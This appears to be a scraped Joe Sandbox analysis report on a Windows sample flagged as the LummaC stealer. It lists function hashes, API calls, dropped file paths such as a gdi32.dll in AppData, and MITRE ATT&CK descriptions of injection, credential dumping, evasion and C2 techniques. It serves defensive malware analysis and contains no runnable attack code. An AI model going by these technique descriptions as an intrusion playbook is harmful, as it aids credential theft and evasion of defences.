API String ID: 237503144-1886922373
Opcode ID: a7176d0c0a9cb3c5111583f076da233104bf071a217a5fccf090a09703d863e5
Instruction ID: a1a6bd0a9484b35f1268412a99a66c4673a5a9ea08cf986f9bed1e9a8657924a
Opcode Fuzzy Hash: a7176d0c0a9cb3c5111583f076da233104bf071a217a5fccf090a09703d863e5
Instruction Fuzzy Hash: 1FD1EA71A083158FD725DF28D890BABF7F6EFC5314F05892CE9999B281E7B09505CB82

Function 027B3A50 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 267COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,D797D5F1), ref: 027B3B72
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,D797D5F1,D797D5F1), ref: 027B3BE2

Strings

qx, xrefs: 027B3AAE

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: qx
API String ID: 237503144-692295476
Opcode ID: f1a09d7fb0bd809742253951a2c930d29f9dc33d60e1b7b1ef0ec276f03ac050
Instruction ID: f986a4827137238041d2440b1ed0d8bee27c56ae7a87c67d235b7dccf75c1684
Opcode Fuzzy Hash: f1a09d7fb0bd809742253951a2c930d29f9dc33d60e1b7b1ef0ec276f03ac050
Instruction Fuzzy Hash: D98124B5E403199FEB10CFA8EC807DEBBB1FB44310F158169E949AB281D37198068BD0

Function 027BBBCD Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 167COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 027BBD11

Strings

; ,), xrefs: 027BBC25
8, xrefs: 027BBD33
?&x+, xrefs: 027BBC30

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: FreeLibrary
String ID: 8$; ,)$?&x+
API String ID: 3664257935-698864271
Opcode ID: bf57d832783c55b0e0bc0c8943cd14c26ff96d0b4ef054224db9509766a1358d
Instruction ID: 646e4bb0aeb9788e1ab9107cfa78b19e0d75d1ec8de8490f77fda0349e7247cd
Opcode Fuzzy Hash: bf57d832783c55b0e0bc0c8943cd14c26ff96d0b4ef054224db9509766a1358d
Instruction Fuzzy Hash: 0B515A715483C08BD33A8B258C617ABBFE2DFD6306F14595DE8D69B3C1DA38450A8B52

Function 027B77A6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 027B7925

Strings

V3O=, xrefs: 027B77E5
:W>Q, xrefs: 027B781D
RS, xrefs: 027B7829

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: :W>Q$RS$V3O=
API String ID: 237503144-1471300816
Opcode ID: e712b3a7e22936511270df3cb3d27a207a3c56bf1075138efa48fba79e212513
Instruction ID: f39bc39a8fb6ce03643e7a70d12024268aa333e8a132bba39fb481714ef09be4
Opcode Fuzzy Hash: e712b3a7e22936511270df3cb3d27a207a3c56bf1075138efa48fba79e212513
Instruction Fuzzy Hash: 994166726483548FC324CF55998038FFBE0EBC4714F0A4A2CE9E967351D7B49906CB82

Function 027BED1D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 027BED23

Strings

?7g), xrefs: 027BEF71
0, xrefs: 027BF026

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: FreeString
String ID: 0$?7g)
API String ID: 3341692771-1620791588
Opcode ID: e298aace35096c3fa5a8d7ed65db5b78534bf41026a241841080f5ffcf22e9a2
Instruction ID: 427d86f4c2d9ece29f01b12ce3bd6926854d706234f1c370f3cb29a44568a788
Opcode Fuzzy Hash: e298aace35096c3fa5a8d7ed65db5b78534bf41026a241841080f5ffcf22e9a2
Instruction Fuzzy Hash: 5C91B470508FC0CAE326863888987D7BFD11BA6318F08499DC1FE4B3D2C7BA2159C766

Function 027B3190 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 027B324D

Strings

G%&, xrefs: 027B321D
G%&, xrefs: 027B3265

Memory Dump Source

Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true

Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: G%&$G%&
API String ID: 237503144-3960618973
Opcode ID: 89204ddcaec50fccc18cc35f13355c1c48c2999a43c185b9f9cde48bbce7905d
Instruction ID: 2f749a6387ba6162aa3d0523c72d9a3eda3b1557e679f4fb1c3423cfc8640449
Opcode Fuzzy Hash: 89204ddcaec50fccc18cc35f13355c1c48c2999a43c185b9f9cde48bbce7905d
Instruction Fuzzy Hash: E421FD74A0C354AFE314CE25E80175FBBE5EBC2B04F14C92DE5D96B281DB7599068B82

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9cOUjp7ybm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9cOUjp7ybm.exe_b952a5b7d6b454dd87179fa1ef45e68ce4bf810_2bfc0910_afc74728-264e-41f0-bf2f-00ecc5bf4e9f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB44.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC5E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
9cOUjp7ybm.exe

Function 6CE17960 Relevance: 9.7, APIs: 3, Strings: 2, Instructions: 984
nativeCOMMON

Function 6CE1FAE8 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CE1FB98 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CE1F9E1 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CE2480D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6CE25070 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 6CE22DD6 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre